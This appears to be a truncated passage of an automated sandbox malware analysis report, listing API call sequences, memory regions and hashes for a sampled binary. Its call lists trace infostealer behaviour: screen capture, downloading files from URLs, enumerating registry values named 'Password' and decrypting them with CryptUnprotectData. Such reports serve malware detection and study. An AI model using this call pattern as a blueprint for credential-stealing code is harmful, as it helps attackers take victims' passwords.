                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: a1d21ed4d31c473cd37dfc951afef10e4adb1588e2dcaffa93a3fdfc98cc69b4
                              • Instruction ID: 1d8eef75055eb479be48a3e410d007c92597556dddd144b51970196b8a599706
                              • Opcode Fuzzy Hash: a1d21ed4d31c473cd37dfc951afef10e4adb1588e2dcaffa93a3fdfc98cc69b4
                              • Instruction Fuzzy Hash: 9161A27190221AAFCF10EFB4C849EAE7FF8BF4A740F144169E801E7211E77599458BA1
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 005B4264
                              • GetDesktopWindow.USER32 ref: 005B426E
                              • GetWindowRect.USER32(00000000,?), ref: 005B427C
                              • SelectObject.GDI32(00000000,00000000), ref: 005B42B3
                              • GetHGlobalFromStream.COMBASE(?,?), ref: 005B4335
                              • GlobalLock.KERNEL32(?), ref: 005B4340
                              • GlobalSize.KERNEL32(?), ref: 005B434F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                              • String ID:
                              • API String ID: 1264946473-0
                              • Opcode ID: 057dac6e57ce5c0caf83ae36f23d31d4d152115890d41a27037fe2332296932f
                              • Instruction ID: 7e6979fdd748821f364c70cafb544f7b6851a26cc4fb1158effc02b196cd04f4
                              • Opcode Fuzzy Hash: 057dac6e57ce5c0caf83ae36f23d31d4d152115890d41a27037fe2332296932f
                              • Instruction Fuzzy Hash: 2A512471214305AFD750EF64DC89EAFBBA9FB88700F00891DFA8583251DB34E9458BA6
                              APIs
                              • lstrcat.KERNEL32(?,0160E838), ref: 005AE12D
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 005AE157
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AE18F
                              • lstrcat.KERNEL32(?,00000000), ref: 005AE19D
                              • lstrcat.KERNEL32(?,?), ref: 005AE1B8
                              • lstrcat.KERNEL32(?,?), ref: 005AE1CC
                              • lstrcat.KERNEL32(?,015FBED0), ref: 005AE1E0
                              • lstrcat.KERNEL32(?,?), ref: 005AE1F4
                              • lstrcat.KERNEL32(?,0160DE60), ref: 005AE207
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AE23F
                              • GetFileAttributesA.KERNEL32(00000000), ref: 005AE246
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                              • String ID:
                              • API String ID: 4230089145-0
                              • Opcode ID: 2dd21ff8b6ebe2a93be14abb10b85fa60a497dbe2f356acfbdbee22d6c161918
                              • Instruction ID: 0e50e152c421a48f356e086ef928a612c04aac49a352bb5ad08ec4f730920f61
                              • Opcode Fuzzy Hash: 2dd21ff8b6ebe2a93be14abb10b85fa60a497dbe2f356acfbdbee22d6c161918
                              • Instruction Fuzzy Hash: FD619E7591111DEBCF50DB64CD49ADDBBB9FF88300F1089A9A649A3240DB34AF858F50
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00596A3F
                              • InternetOpenA.WININET(005BD014,00000001,00000000,00000000,00000000), ref: 00596A6C
                              • StrCmpCA.SHLWAPI(?,0160EF20), ref: 00596A8A
                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00596AAA
                              • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00596AC8
                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00596AE1
                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00596B06
                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00596B30
                              • CloseHandle.KERNEL32(00000000), ref: 00596B50
                              • InternetCloseHandle.WININET(00000000), ref: 00596B57
                              • InternetCloseHandle.WININET(?), ref: 00596B61
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                              • String ID:
                              • API String ID: 2500263513-0
                              • Opcode ID: ae9c6df6cc2d7d241f8722685166333d665383d190bd422ca6b765e33e407445
                              • Instruction ID: a9ca3faf4d6310c0243dedbe78a1825ab39be83bb7b27224fb9d1edaf4ea1d02
                              • Opcode Fuzzy Hash: ae9c6df6cc2d7d241f8722685166333d665383d190bd422ca6b765e33e407445
                              • Instruction Fuzzy Hash: ED419271A00219ABDF60DF64DC49FAE7BB9FB44700F108458FA05E7180EF74AD458BA9
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,?,?,005A5328), ref: 005B4565
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005B456C
                              • wsprintfW.USER32 ref: 005B457B
                              • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 005B45EA
                              • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 005B45F9
                              • CloseHandle.KERNEL32(00000000,?,?), ref: 005B4600
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                              • String ID: (SZ$%hs$(SZ
                              • API String ID: 885711575-2712158924
                              • Opcode ID: 1001f75ed7e994f8218792ea3a787b909d753b72cdedbf1c1ce027169c7f065d
                              • Instruction ID: 5de4e27e23ea9880b4c8021d4b7d005c23e43c50f8abfd43c2517411cc30e8f0
                              • Opcode Fuzzy Hash: 1001f75ed7e994f8218792ea3a787b909d753b72cdedbf1c1ce027169c7f065d
                              • Instruction Fuzzy Hash: 65313071A00219BBDB20DBE4DC49FDE7B78FF45700F104059F605A6181EB74AA418BA9
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 0059BD0F
                              • lstrlen.KERNEL32(00000000), ref: 0059BD42
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059BD6C
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0059BD74
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059BD9C
                              • lstrlen.KERNEL32(005C509C), ref: 0059BE13
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat
                              • String ID:
                              • API String ID: 2500673778-0
                              • Opcode ID: f454faaca8bb29c178732a72ef577609fca22d5ff3b0811e6ff2541ed08f758b
                              • Instruction ID: 0e70d6b3676ad10c19c68f719bbf0d27ac7ccf85027bf12dfc5b754c03eac399
                              • Opcode Fuzzy Hash: f454faaca8bb29c178732a72ef577609fca22d5ff3b0811e6ff2541ed08f758b
                              • Instruction Fuzzy Hash: 69A162309012069FEF14DF69DA4DAAE7BB8FF84704F19806DE5059B261DB35DC42CB94
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 005B5F5A
                              • std::_Xinvalid_argument.LIBCPMT ref: 005B5F79
                              • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 005B6044
                              • memmove.MSVCRT(00000000,00000000,?), ref: 005B60CF
                              • std::_Xinvalid_argument.LIBCPMT ref: 005B6100
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_$memmove
                              • String ID: invalid string position$string too long
                              • API String ID: 1975243496-4289949731
                              • Opcode ID: 218109dcf2b4394a5aa582a344977ab28cd258eceb7cbffbab194438d76c4d99
                              • Instruction ID: 8c88a27d89542a1e0208620c888613ec201370ca6fb61dedb140074c40b1080b
                              • Opcode Fuzzy Hash: 218109dcf2b4394a5aa582a344977ab28cd258eceb7cbffbab194438d76c4d99
                              • Instruction Fuzzy Hash: 15618070710508DBDB18DF5DC8D9AAEBBB6FF84304B244A19E4928B382D775BD808B95
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AE18F
                              • lstrcat.KERNEL32(?,00000000), ref: 005AE19D
                              • lstrcat.KERNEL32(?,?), ref: 005AE1B8
                              • lstrcat.KERNEL32(?,?), ref: 005AE1CC
                              • lstrcat.KERNEL32(?,015FBED0), ref: 005AE1E0
                              • lstrcat.KERNEL32(?,?), ref: 005AE1F4
                              • lstrcat.KERNEL32(?,0160DE60), ref: 005AE207
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AE23F
                              • GetFileAttributesA.KERNEL32(00000000), ref: 005AE246
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$AttributesFile
                              • String ID:
                              • API String ID: 3428472996-0
                              • Opcode ID: 0e8b1c484c5bf48be582b988eb6d2235f3787af9515c4ae5badfec5281b1f69a
                              • Instruction ID: a4160d6544ee5e8a93dba863c30f4a238cc98307381591df75d3129b41b01018
                              • Opcode Fuzzy Hash: 0e8b1c484c5bf48be582b988eb6d2235f3787af9515c4ae5badfec5281b1f69a
                              • Instruction Fuzzy Hash: 1A41AF75911129ABCF50EB64CC49ADD7BB8FF88300F1089A9FA4993251DB349FC58F90
                              APIs
                                • Part of subcall function 00597710: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00597745
                                • Part of subcall function 00597710: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0059778A
                                • Part of subcall function 00597710: StrStrA.SHLWAPI(?,Password), ref: 005977F8
                                • Part of subcall function 00597710: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0059782C
                                • Part of subcall function 00597710: HeapFree.KERNEL32(00000000), ref: 00597833
                              • lstrcat.KERNEL32(00000000,005C509C), ref: 005979D0
                              • lstrcat.KERNEL32(00000000,?), ref: 005979FD
                              • lstrcat.KERNEL32(00000000, : ), ref: 00597A0F
                              • lstrcat.KERNEL32(00000000,?), ref: 00597A30
                              • wsprintfA.USER32 ref: 00597A50
                              • lstrcpy.KERNEL32(00000000,?), ref: 00597A79
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00597A87
                              • lstrcat.KERNEL32(00000000,005C509C), ref: 00597AA0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                              • String ID: :
                              • API String ID: 398153587-3653984579
                              • Opcode ID: 7ebde50406af1dd6dd61bbfe7580bbef568c87c63c58ae9908b3264c418649e8
                              • Instruction ID: 73d2939241333d8dc57b2f86e484edb5a01f87244b5f52c3685be1829acce8db
                              • Opcode Fuzzy Hash: 7ebde50406af1dd6dd61bbfe7580bbef568c87c63c58ae9908b3264c418649e8
                              • Instruction Fuzzy Hash: 2031777291421DEFCF50DBA4DC48D6FBF79FB88710B14451DE54693200DB74A981C795
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 005A829C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A82D3
                              • lstrlen.KERNEL32(00000000), ref: 005A82F0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A8327
                              • lstrlen.KERNEL32(00000000), ref: 005A8344
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A837B
                              • lstrlen.KERNEL32(00000000), ref: 005A8398
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A83C7
                              • lstrlen.KERNEL32(00000000), ref: 005A83E1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A8410
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: e2de98a7c58a058847cd8b8397e5b6e686abec70cdc5bbf1c31c1123dc333ae1
                              • Instruction ID: 9a2a82f681dcd8197a20d9c6a9f58ba2386c144fc3cba681fbac6ae51f8f062c
                              • Opcode Fuzzy Hash: e2de98a7c58a058847cd8b8397e5b6e686abec70cdc5bbf1c31c1123dc333ae1
                              • Instruction Fuzzy Hash: 02513A71901613ABDB149F69D858ABEBFA8FF49704F158518AC06DB244EB34ED50CBE0
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00597745
                              • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0059778A
                              • StrStrA.SHLWAPI(?,Password), ref: 005977F8
                                • Part of subcall function 00597690: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0059769E
                                • Part of subcall function 00597690: RtlAllocateHeap.NTDLL(00000000), ref: 005976A5
                                • Part of subcall function 00597690: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 005976CD
                                • Part of subcall function 00597690: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 005976ED
                                • Part of subcall function 00597690: LocalFree.KERNEL32(?), ref: 005976F7
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0059782C
                              • HeapFree.KERNEL32(00000000), ref: 00597833
                              • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00597975
                              Strings
                              Memory Dump Source
